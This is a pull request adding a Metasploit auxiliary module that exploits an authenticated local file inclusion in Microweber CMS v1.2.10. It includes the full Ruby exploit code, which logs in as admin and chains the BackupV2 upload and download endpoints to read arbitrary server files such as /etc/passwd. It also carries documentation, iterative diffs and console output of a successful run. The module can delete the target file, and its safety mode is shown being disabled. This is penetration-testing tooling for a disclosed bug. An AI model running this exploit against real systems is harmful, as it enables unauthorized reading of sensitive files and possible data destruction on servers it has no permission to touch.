### PR TITLE
Microweber v1.2.10 Local File Inclusion (Authenticated)

### DIFF
--- a/documentation/modules/auxiliary/gather/microweber_lfi.md
+++ b/documentation/modules/auxiliary/gather/microweber_lfi.md
@@ -9,8 +9,8 @@ If you want, you can follow the steps in the official vulnerability report to re
 - [ ] Start `msfconsole`
 - [ ] Run `use auxiliary/gather/microweber_lfi`
 - [ ] Set `RHOSTS`
-- [ ] Set `ADMIN_USER`
-- [ ] Set `ADMIN_PASS`
+- [ ] Set `USERNAME`
+- [ ] Set `PASSWORD`
 - [ ] Set `LOCAL_FILE_PATH`
 - [ ] Run `exploit`
 - [ ] Verify that you see `Checking Microweber's version.`
@@ -28,14 +28,14 @@ Module options (auxiliary/gather/microweber_lfi):
 
    Name             Current Setting  Required  Description
    ----             ---------------  --------  -----------
-   ADMIN_PASS       admin            yes       The admin's password for Microweber
-   ADMIN_USER       admin            yes       The admin's username for Microweber
-   LOCAL_FILE_PATH  /etc/hosts       yes       The path of the local file.
+   LOCAL_FILE_PATH  /etc/passwd      yes       The path of the local file.
+   PASSWORD                          yes       The admin's password for Microweber
    Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS           192.168.188.132  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RHOSTS                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
    RPORT            80               yes       The target port (TCP)
    SSL              false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI        /                yes       The base path for Microweber
+   USERNAME                          yes       The admin's username for Microweber
    VHOST                             no        HTTP server virtual host
 ```
 
@@ -44,13 +44,14 @@ This module has been tested against Microweber CMS v1.2.10 installed on Ubuntu.
 
 ```
 msf6 auxiliary(gather/microweber_lfi) > use auxiliary/gather/microweber_lfi
-msf6 auxiliary(gather/microweber_lfi) > set admin_user admin
-admin_user => admin
-msf6 auxiliary(gather/microweber_lfi) > set admin_pass
-admin_pass => admin
+msf6 auxiliary(gather/microweber_lfi) > set username admin
+username => admin
+msf6 auxiliary(gather/microweber_lfi) > set password admin
+password => admin
+msf6 auxiliary(gather/microweber_lfi) > set rhosts 192.168.188.132
+rhosts => 192.168.188.132
 msf6 auxiliary(gather/microweber_lfi) > set local_file_path /etc/hosts
-local_file_path => /etc/hosts
-
+local_file_path => /etc/passwd
 msf6 auxiliary(gather/microweber_lfi) > check
 
 [!] Triggering this vulnerability may delete the local file that is wanted to be read.
@@ -64,10 +65,10 @@ msf6 auxiliary(gather/microweber_lfi) > exploit
 [*] Checking Microweber's version.
 [+] Microweber Version: 1.2.10
 [+] You are logged in
-[*] Uploading /etc/hosts to the backup folder.
-[+] hosts was moved!
-[*] Downloading hosts from the backup folder.
-127.0.0.1 localhost
+[*] Uploading /etc/passwd to the backup folder.
+[+] passwd was moved!
+[*] Downloading passwd from the backup folder.
+[*] 127.0.0.1 localhost
 127.0.1.1 ubuntu-srv-tk
 
 # The following lines are desirable for IPv6 capable hosts
@@ -76,5 +77,6 @@ fe00::0 ip6-localnet
 ff00::0 ip6-mcastprefix
 ff02::1 ip6-allnodes
 ff02::2 ip6-allrouters
+
 [*] Auxiliary module execution completed
 ```

--- a/documentation/modules/auxiliary/gather/microweber_lfi.md
+++ b/documentation/modules/auxiliary/gather/microweber_lfi.md
@@ -1,0 +1,80 @@
+## Vulnerable Applications
+Microweber CMS v1.2.10 LFI (Authenticated) has been verified and fixed according to the maintainer of the project. You check out the vulnerability report:
+https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/
+
+**The older versions of Microweber CMS might be vulnerable too. I've not tested the module against the other versions.**
+If you want, you can follow the steps in the official vulnerability report to reproduce the vulnerability against the older versions. (not guaranteed)
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] Run `use auxiliary/gather/microweber_lfi`
+- [ ] Set `RHOSTS`
+- [ ] Set `ADMIN_USER`
+- [ ] Set `ADMIN_PASS`
+- [ ] Set `LOCAL_FILE_PATH`
+- [ ] Run `exploit`
+- [ ] Verify that you see `Checking Microweber's version.`
+- [ ] Verify that you see `Microweber Version: 1.2.10`
+- [ ] Verify that you see `You are logged in`
+- [ ] Verify that you see `Uploading LOCAL_FILE_PATH to the backup folder.`
+- [ ] Verify that you see `FILE was moved!`
+- [ ] Verify that you see `Downloading FILE from the backup folder.`
+
+## Options
+```
+msf6 auxiliary(gather/microweber_lfi) > options
+
+Module options (auxiliary/gather/microweber_lfi):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   ADMIN_PASS       admin            yes       The admin's password for Microweber
+   ADMIN_USER       admin            yes       The admin's username for Microweber
+   LOCAL_FILE_PATH  /etc/hosts       yes       The path of the local file.
+   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS           192.168.188.132  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT            80               yes       The target port (TCP)
+   SSL              false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI        /                yes       The base path for Microweber
+   VHOST                             no        HTTP server virtual host
+```
+
+## Scenerios
+This module has been tested against Microweber CMS v1.2.10 installed on Ubuntu.
+
+```
+msf6 auxiliary(gather/microweber_lfi) > use auxiliary/gather/microweber_lfi
+msf6 auxiliary(gather/microweber_lfi) > set admin_user admin
+admin_user => admin
+msf6 auxiliary(gather/microweber_lfi) > set admin_pass
+admin_pass => admin
+msf6 auxiliary(gather/microweber_lfi) > set local_file_path /etc/hosts
+local_file_path => /etc/hosts
+
+msf6 auxiliary(gather/microweber_lfi) > check
+
+[!] Triggering this vulnerability may delete the local file that is wanted to be read.
+[*] Checking Microweber's version.
+[+] Microweber Version: 1.2.10
+[+] 192.168.188.132:80 - The target is vulnerable.
+msf6 auxiliary(gather/microweber_lfi) > exploit
+[*] Running module against 192.168.188.132
+
+[!] Triggering this vulnerability may delete the local file that is wanted to be read.
+[*] Checking Microweber's version.
+[+] Microweber Version: 1.2.10
+[+] You are logged in
+[*] Uploading /etc/hosts to the backup folder.
+[+] hosts was moved!
+[*] Downloading hosts from the backup folder.
+127.0.0.1 localhost
+127.0.1.1 ubuntu-srv-tk
+
+# The following lines are desirable for IPv6 capable hosts
+::1     ip6-localhost ip6-loopback
+fe00::0 ip6-localnet
+ff00::0 ip6-mcastprefix
+ff02::1 ip6-allnodes
+ff02::2 ip6-allrouters
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/gather/microweber_lfi.md
+++ b/documentation/modules/auxiliary/gather/microweber_lfi.md
@@ -13,8 +13,12 @@ If you want, you can follow the steps in the official vulnerability report to re
 - [ ] Set `PASSWORD`
 - [ ] Set `LOCAL_FILE_PATH`
 - [ ] Run `exploit`
+- [ ] Verify that you see `Checking if it's Microweber CMS.`
+- [ ] Verify that you see `Microweber CMS has been detected.`
 - [ ] Verify that you see `Checking Microweber's version.`
-- [ ] Verify that you see `Microweber Version: 1.2.10`
+- [ ] Verify that you see `Microweber version 1.2.10`
+- [ ] Verify that you see `The target appears to be vulnerable.`
+- [ ] Verify that you see `Trying to log in.`
 - [ ] Verify that you see `You are logged in`
 - [ ] Verify that you see `Uploading LOCAL_FILE_PATH to the backup folder.`
 - [ ] Verify that you see `FILE was moved!`
@@ -28,14 +32,15 @@ Module options (auxiliary/gather/microweber_lfi):
 
    Name             Current Setting  Required  Description
    ----             ---------------  --------  -----------
-   LOCAL_FILE_PATH  /etc/hosts       yes       The path of the local file.
-   PASSWORD         admin            yes       The admin's password for Microweber
+   DEFANGED_MODE    true             yes       Run in defanged mode
+   LOCAL_FILE_PATH                   yes       The path of the local file.
+   PASSWORD                          yes       The admin's password for Microweber
    Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS           192.168.188.132  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RHOSTS                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
    RPORT            80               yes       The target port (TCP)
    SSL              false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI        /                yes       The base path for Microweber
-   USERNAME         admin            yes       The admin's username for Microweber
+   USERNAME                          yes       The admin's username for Microweber
    VHOST                             no        HTTP server virtual host
 ```
 
@@ -54,16 +59,35 @@ msf6 auxiliary(gather/microweber_lfi) > set rhosts 192.168.188.132
 rhosts => 192.168.188.132
 msf6 auxiliary(gather/microweber_lfi) > check
 
-[!] Triggering this vulnerability may delete the local file that is wanted to be read.
+[*] Checking if it's Microweber CMS.
+[+] Microweber CMS has been detected.
 [*] Checking Microweber's version.
-[+] Microweber Version: 1.2.10
-[+] 192.168.188.132:80 - The target is vulnerable.
+[+] Microweber version 1.2.10
+[*] 192.168.188.132:80 - The target appears to be vulnerable.
 msf6 auxiliary(gather/microweber_lfi) > exploit
 [*] Running module against 192.168.188.132
 
-[!] Triggering this vulnerability may delete the local file that is wanted to be read.
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if it's Microweber CMS.
+[+] Microweber CMS has been detected.
 [*] Checking Microweber's version.
-[+] Microweber Version: 1.2.10
+[+] Microweber version 1.2.10
+[+] The target appears to be vulnerable.
+[-] Auxiliary aborted due to failure: bad-config: Triggering this vulnerability may delete the local file if the web service user has the permission.
+If you want to continue, disable the DEFANGED_MODE.
+=> set DEFANGED_MODE false
+msf6 auxiliary(gather/microweber_lfi) > set defanged_mode false
+defanged_mode => false
+msf6 auxiliary(gather/microweber_lfi) > exploit
+[*] Running module against 192.168.188.132
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if it's Microweber CMS.
+[+] Microweber CMS has been detected.
+[*] Checking Microweber's version.
+[+] Microweber version 1.2.10
+[+] The target appears to be vulnerable.
+[*] Trying to log in.
 [+] You are logged in
 [*] Uploading /etc/hosts to the backup folder.
 [+] hosts was moved!

--- a/documentation/modules/auxiliary/gather/microweber_lfi.md
+++ b/documentation/modules/auxiliary/gather/microweber_lfi.md
@@ -28,14 +28,14 @@ Module options (auxiliary/gather/microweber_lfi):
 
    Name             Current Setting  Required  Description
    ----             ---------------  --------  -----------
-   LOCAL_FILE_PATH  /etc/passwd      yes       The path of the local file.
-   PASSWORD                          yes       The admin's password for Microweber
+   LOCAL_FILE_PATH  /etc/hosts       yes       The path of the local file.
+   PASSWORD         admin            yes       The admin's password for Microweber
    Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RHOSTS           192.168.188.132  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
    RPORT            80               yes       The target port (TCP)
    SSL              false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI        /                yes       The base path for Microweber
-   USERNAME                          yes       The admin's username for Microweber
+   USERNAME         admin            yes       The admin's username for Microweber
    VHOST                             no        HTTP server virtual host
 ```
 
@@ -48,10 +48,10 @@ msf6 auxiliary(gather/microweber_lfi) > set username admin
 username => admin
 msf6 auxiliary(gather/microweber_lfi) > set password admin
 password => admin
+msf6 auxiliary(gather/microweber_lfi) > set local_file_path /etc/hosts
+local_file_path => /etc/hosts
 msf6 auxiliary(gather/microweber_lfi) > set rhosts 192.168.188.132
 rhosts => 192.168.188.132
-msf6 auxiliary(gather/microweber_lfi) > set local_file_path /etc/hosts
-local_file_path => /etc/passwd
 msf6 auxiliary(gather/microweber_lfi) > check
 
 [!] Triggering this vulnerability may delete the local file that is wanted to be read.
@@ -65,9 +65,9 @@ msf6 auxiliary(gather/microweber_lfi) > exploit
 [*] Checking Microweber's version.
 [+] Microweber Version: 1.2.10
 [+] You are logged in
-[*] Uploading /etc/passwd to the backup folder.
-[+] passwd was moved!
-[*] Downloading passwd from the backup folder.
+[*] Uploading /etc/hosts to the backup folder.
+[+] hosts was moved!
+[*] Downloading hosts from the backup folder.
 [*] 127.0.0.1 localhost
 127.0.1.1 ubuntu-srv-tk
 

--- a/modules/auxiliary/gather/microweber_lfi.rb
+++ b/modules/auxiliary/gather/microweber_lfi.rb
@@ -4,8 +4,6 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
-  Rank = ExcellentRanking
-
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -62,15 +60,16 @@ class MetasploitModule < Msf::Auxiliary
 
     begin
       version = res.body[/Version:\s+\d+\.\d+\.\d+/].gsub(' ', '').gsub(':', ': ')
-      print_good 'Microweber ' + version
     rescue NoMethodError, TypeError
       return false
     end
 
     if version.include?('Version: 1.2.10')
+      print_good 'Microweber ' + version
       return true
     end
 
+    print_error 'Microweber ' + version
     return false
   end
 

--- a/modules/auxiliary/gather/microweber_lfi.rb
+++ b/modules/auxiliary/gather/microweber_lfi.rb
@@ -11,9 +11,9 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name' => 'Microweber v1.2.10 Local File Inclusion (Authenticated)',
+        'Name' => 'Microweber CMS v1.2.10 Local File Inclusion (Authenticated)',
         'Description' => %q{
-          Microweber v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
+          Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
           Upload function may delete the local file if the web service user has access.
         },
         'License' => MSF_LICENSE,
@@ -195,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    if datastore['DEFANGED_MODE'] == true.to_s
+    if datastore['DEFANGED_MODE'].to_s == 'true'
       warning = <<~EOF
         Triggering this vulnerability may delete the local file if the web service user has the permission.
         If you want to continue, disable the DEFANGED_MODE.

--- a/modules/auxiliary/gather/microweber_lfi.rb
+++ b/modules/auxiliary/gather/microweber_lfi.rb
@@ -195,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    if datastore['DEFANGED_MODE'] == true
+    if datastore['DEFANGED_MODE'] == true.to_s
       warning = <<~EOF
         Triggering this vulnerability may delete the local file if the web service user has the permission.
         If you want to continue, disable the DEFANGED_MODE.

--- a/modules/auxiliary/gather/microweber_lfi.rb
+++ b/modules/auxiliary/gather/microweber_lfi.rb
@@ -38,8 +38,8 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']),
-        OptString.new('ADMIN_USER', [true, 'The admin\'s username for Microweber']),
-        OptString.new('ADMIN_PASS', [true, 'The admin\'s password for Microweber']),
+        OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']),
+        OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']),
         OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']),
       ]
     )
@@ -78,8 +78,8 @@ class MetasploitModule < Msf::Auxiliary
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'api', 'user_login'),
       'vars_post' => {
-        'username' => datastore['ADMIN_USER'],
-        'password' => datastore['ADMIN_PASS'],
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
         'lang' => '',
         'where_to' => 'admin_content'
       }

--- a/modules/auxiliary/gather/microweber_lfi.rb
+++ b/modules/auxiliary/gather/microweber_lfi.rb
@@ -195,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    if datastore['DEFANG_MODE'] == true
+    if datastore['DEFANGED_MODE'] == true
       warning = <<~EOF
         Triggering this vulnerability may delete the local file if the web service user has the permission.
         If you want to continue, disable the DEFANGED_MODE.

--- a/modules/auxiliary/gather/microweber_lfi.rb
+++ b/modules/auxiliary/gather/microweber_lfi.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']),
         OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']),
         OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']),
-        OptString.new('DEFANGED_MODE', [true, 'Run in defanged mode', true])
+        OptBool.new('DEFANGED_MODE', [true, 'Run in defanged mode', true])
       ]
     )
   end
@@ -205,7 +205,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    if datastore['DEFANGED_MODE'].to_s == 'true'
+    if datastore['DEFANGED_MODE']
       warning = <<~EOF
         Triggering this vulnerability may delete the local file if the web service user has the permission.
         If you want to continue, disable the DEFANGED_MODE.

--- a/modules/auxiliary/gather/microweber_lfi.rb
+++ b/modules/auxiliary/gather/microweber_lfi.rb
@@ -1,0 +1,184 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  Rank = ExcellentRanking
+  
+  include Msf::Exploit::Remote::HttpClient
+  
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Microweber v1.2.10 Local File Inclusion (Authenticated)",
+      'Description'    => %q{
+        Microweber v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
+        Upload function may delete the local file if the web service user has access.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Talha Karakumru <talhakarakumru[at]gmail.com>'
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/']
+        ],
+      'Notes'          =>
+        {
+          'SideEffects' => [ 'ARTIFACTS_ON_DISK', 'IOC_IN_LOGS' ],
+          'Reliability' => [ 'REPEATABLE_SESSION' ],
+          'Stability'   => [ 'OS_RESOURCE_LOSS' ]
+        },
+      'Targets'        =>
+        [
+          [ 'Microweber v1.2.10', {} ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "2022-01-30"
+      ))
+  
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']),
+        OptString.new('ADMIN_USER', [true, 'The admin\'s username for Microweber']),
+        OptString.new('ADMIN_PASS', [true, 'The admin\'s password for Microweber']),
+        OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']),
+      ])
+  end
+
+  def check
+    check_version ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+  end
+  
+  def check_version
+    print_warning 'Triggering this vulnerability may delete the local file that is wanted to be read.'
+    print_status 'Checking Microweber\'s version.'
+  
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'admin', 'login')
+    })
+  
+    begin
+      version = res.body[/Version:\s+\d+\.\d+\.\d+/].gsub(' ', '').gsub(':', ': ')
+    rescue NoMethodError, TypeError
+      return false
+    end
+  
+    if version.include?('Version: 1.2.10')
+      print_good 'Microweber ' + version
+      return true
+    end
+
+    return false
+  end
+  
+  def login
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'api', 'user_login'),
+      'vars_post' => {
+        'username' => datastore['ADMIN_USER'],
+        'password' => datastore['ADMIN_PASS'],
+        'lang' => '',
+        'where_to' => 'admin_content'
+      }
+    })
+  
+    if res.headers['Content-Type'] == 'application/json'
+      jsonRes = res.get_json_document
+  
+      if res.code != 200
+        print_error 'Microweber cannot be reached.'
+        return false
+      end
+
+      if !jsonRes['error'].nil?
+        print_error jsonRes['error']
+        return false
+      end
+
+      if !jsonRes['success'].nil? && jsonRes['success'] == 'You are logged in'
+        print_good jsonRes['success']
+        @cookie = res.get_cookies
+        return true
+      end
+
+      print_error 'An unknown error occurred.'
+      return false
+    end
+
+    print_status res.body
+    return true  
+  end
+  
+  def upload
+    print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.'
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'),
+      'cookie'    => @cookie,
+      'vars_get'  => {
+        'src' => datastore['LOCAL_FILE_PATH']
+      },
+      'headers'   => {
+        'Referer' => datastore['SSL'] ? 'https://' + datastore['RHOSTS'] + target_uri.path : 'http://' + datastore['RHOSTS'] + target_uri.path
+      }
+    })
+
+    if res.headers['Content-Type'] == 'application/json'
+      jsonRes = res.get_json_document
+
+      if jsonRes['success']
+        print_good jsonRes['success']
+        return true
+      end
+    end
+
+    print_error 'Either the file cannot be read or the file does not exist.'
+    return false
+  end
+
+  def download
+    filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1]
+    print_status 'Downloading ' + filename + ' from the backup folder.'
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'),
+      'cookie'    => @cookie,
+      'vars_get'  => {
+        'filename' => filename
+      },
+      'headers'   => {
+        'Referer' => datastore['SSL'] ? 'https://' + datastore['RHOSTS'] + target_uri.path : 'http://' + datastore['RHOSTS'] + target_uri.path
+      }
+    })
+
+    if res.headers['Content-Type'] == 'application/json'
+      jsonRes = res.get_json_document
+
+      if jsonRes['error']
+        print_error jsonRes['error']
+        return
+      end
+    end
+
+    print_status res.body
+  end
+
+  def run
+    is_version_valid = check_version
+    is_login_valid = login
+
+    if !is_version_valid || !is_login_valid
+      return
+    end
+
+    is_upload_successful = upload
+    if is_upload_successful
+      download
+    end
+  end
+end

--- a/modules/auxiliary/gather/microweber_lfi.rb
+++ b/modules/auxiliary/gather/microweber_lfi.rb
@@ -136,6 +136,14 @@ class MetasploitModule < Msf::Auxiliary
 
   def try_upload
     print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.'
+
+    referer = ''
+    if !datastore['VHOST'].nil? && !datastore['VHOST'].empty?
+      referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/"
+    else
+      referer = full_uri
+    end
+
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'),
@@ -143,7 +151,7 @@ class MetasploitModule < Msf::Auxiliary
         'src' => datastore['LOCAL_FILE_PATH']
       },
       'headers' => {
-        'Referer' => full_uri
+        'Referer' => referer
       }
     })
 
@@ -173,6 +181,13 @@ class MetasploitModule < Msf::Auxiliary
     filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1]
     print_status 'Downloading ' + filename + ' from the backup folder.'
 
+    referer = ''
+    if !datastore['VHOST'].nil? && !datastore['VHOST'].empty?
+      referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/"
+    else
+      referer = full_uri
+    end
+
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'),
@@ -180,7 +195,7 @@ class MetasploitModule < Msf::Auxiliary
         'filename' => filename
       },
       'headers' => {
-        'Referer' => full_uri
+        'Referer' => referer
       }
     })
 


### PR DESCRIPTION
Microweber CMS v1.2.10 LFI (Authenticated) has been verified and fixed according to the maintainer of the project. You check out the vulnerability report:
https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/

**The older versions of Microweber CMS might be vulnerable too. I've not tested the module against the other versions.**
If you want, you can follow the steps in the official vulnerability report to reproduce the vulnerability against the older versions. (not guaranteed)

## PoC
https://user-images.githubusercontent.com/29050766/153470964-c67f50d7-2f21-471b-88e8-6c415394afa0.mp4


## Verification Steps
- [ ] Start `msfconsole`
- [ ] Run `use auxiliary/gather/microweber_lfi`
- [ ] Set `RHOSTS`
- [ ] Set `USERNAME`
- [ ] Set `PASSWORD`
- [ ] Set `LOCAL_FILE_PATH`
- [ ] Run `exploit`
- [ ] Verify that you see `Checking if it's Microweber CMS.`
- [ ] Verify that you see `Microweber CMS has been detected.`
- [ ] Verify that you see `Checking Microweber's version.`
- [ ] Verify that you see `Microweber version 1.2.10`
- [ ] Verify that you see `The target appears to be vulnerable.`
- [ ] Verify that you see `Trying to log in.`
- [ ] Verify that you see `You are logged in`
- [ ] Verify that you see `Uploading LOCAL_FILE_PATH to the backup folder.`
- [ ] Verify that you see `FILE was moved!`
- [ ] Verify that you see `Downloading FILE from the backup folder.`

## Options
```
msf6 auxiliary(gather/microweber_lfi) > options

Module options (auxiliary/gather/microweber_lfi):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DEFANGED_MODE    true             yes       Run in defanged mode
   LOCAL_FILE_PATH                   yes       The path of the local file.
   PASSWORD                          yes       The admin's password for Microweber
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT            80               yes       The target port (TCP)
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI        /                yes       The base path for Microweber
   USERNAME                          yes       The admin's username for Microweber
   VHOST                             no        HTTP server virtual host
```

## Scenerios
This module has been tested against Microweber CMS v1.2.10 installed on Ubuntu.

```
msf6 auxiliary(gather/microweber_lfi) > use auxiliary/gather/microweber_lfi
msf6 auxiliary(gather/microweber_lfi) > set username admin
username => admin
msf6 auxiliary(gather/microweber_lfi) > set password admin
password => admin
msf6 auxiliary(gather/microweber_lfi) > set local_file_path /etc/hosts
local_file_path => /etc/hosts
msf6 auxiliary(gather/microweber_lfi) > set rhosts 192.168.188.132
rhosts => 192.168.188.132
msf6 auxiliary(gather/microweber_lfi) > check

[*] Checking if it's Microweber CMS.
[+] Microweber CMS has been detected.
[*] Checking Microweber's version.
[+] Microweber version 1.2.10
[*] 192.168.188.132:80 - The target appears to be vulnerable.
msf6 auxiliary(gather/microweber_lfi) > exploit
[*] Running module against 192.168.188.132

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if it's Microweber CMS.
[+] Microweber CMS has been detected.
[*] Checking Microweber's version.
[+] Microweber version 1.2.10
[+] The target appears to be vulnerable.
[-] Auxiliary aborted due to failure: bad-config: Triggering this vulnerability may delete the local file if the web service user has the permission.
If you want to continue, disable the DEFANGED_MODE.
=> set DEFANGED_MODE false
msf6 auxiliary(gather/microweber_lfi) > set defanged_mode false
defanged_mode => false
msf6 auxiliary(gather/microweber_lfi) > exploit
[*] Running module against 192.168.188.132

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if it's Microweber CMS.
[+] Microweber CMS has been detected.
[*] Checking Microweber's version.
[+] Microweber version 1.2.10
[+] The target appears to be vulnerable.
[*] Trying to log in.
[+] You are logged in
[*] Uploading /etc/hosts to the backup folder.
[+] hosts was moved!
[*] Downloading hosts from the backup folder.
[*] 127.0.0.1 localhost
127.0.1.1 ubuntu-srv-tk

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

[*] Auxiliary module execution completed
```